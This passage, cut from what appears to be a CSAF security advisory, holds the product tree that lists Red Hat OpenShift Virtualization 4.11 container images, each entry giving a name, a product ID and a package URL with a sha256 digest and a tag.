"container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", product_identification_helper: { purl: "pkg:oci/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.11.0-63", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.11.0-601", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_id: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver-rhel8&tag=v4.11.0-21", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_id: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver&tag=v4.11.0-21", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.11.0-21", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.11.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.11.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.11.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", product: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", product_id: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-console-plugin&tag=v4.11.0-83", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.11.0-54", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-copy-template&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-datavolume&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-operator&tag=v4.11.0-29", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status&tag=v4.11.0-7", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.11.0-17", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", product: { name: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", product_id: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.11.0-59", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", product_id: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", product_id: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", product_id: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.11.0-16", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", product_id: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", product_identification_helper: { purl: "pkg:oci/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.11.0-106", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", product: { name: 